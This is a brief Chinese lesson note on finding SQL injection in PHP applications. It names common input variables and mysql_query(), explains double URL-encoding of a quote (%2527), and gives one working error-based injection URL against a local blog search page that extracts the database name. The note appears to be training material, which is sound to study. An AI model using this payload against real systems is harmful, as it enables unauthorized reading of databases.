第四课 sql注入及防护实践

挖掘sql注入漏洞

常见获取变量

$_GET  $_POST $_COOKIE $_SERVER $_REQUEST

数据库操作函数

搜索

mysql_query()

‘url编码是%27

%url编码是%25

%2527

注入测试

http://127.0.0.1/blog/search.php?s=%2527%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,unhex(Hex(cast(database()%20as%20char))),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20%23

 

课后了解

http://www.w3school.com.cn/php/index.asp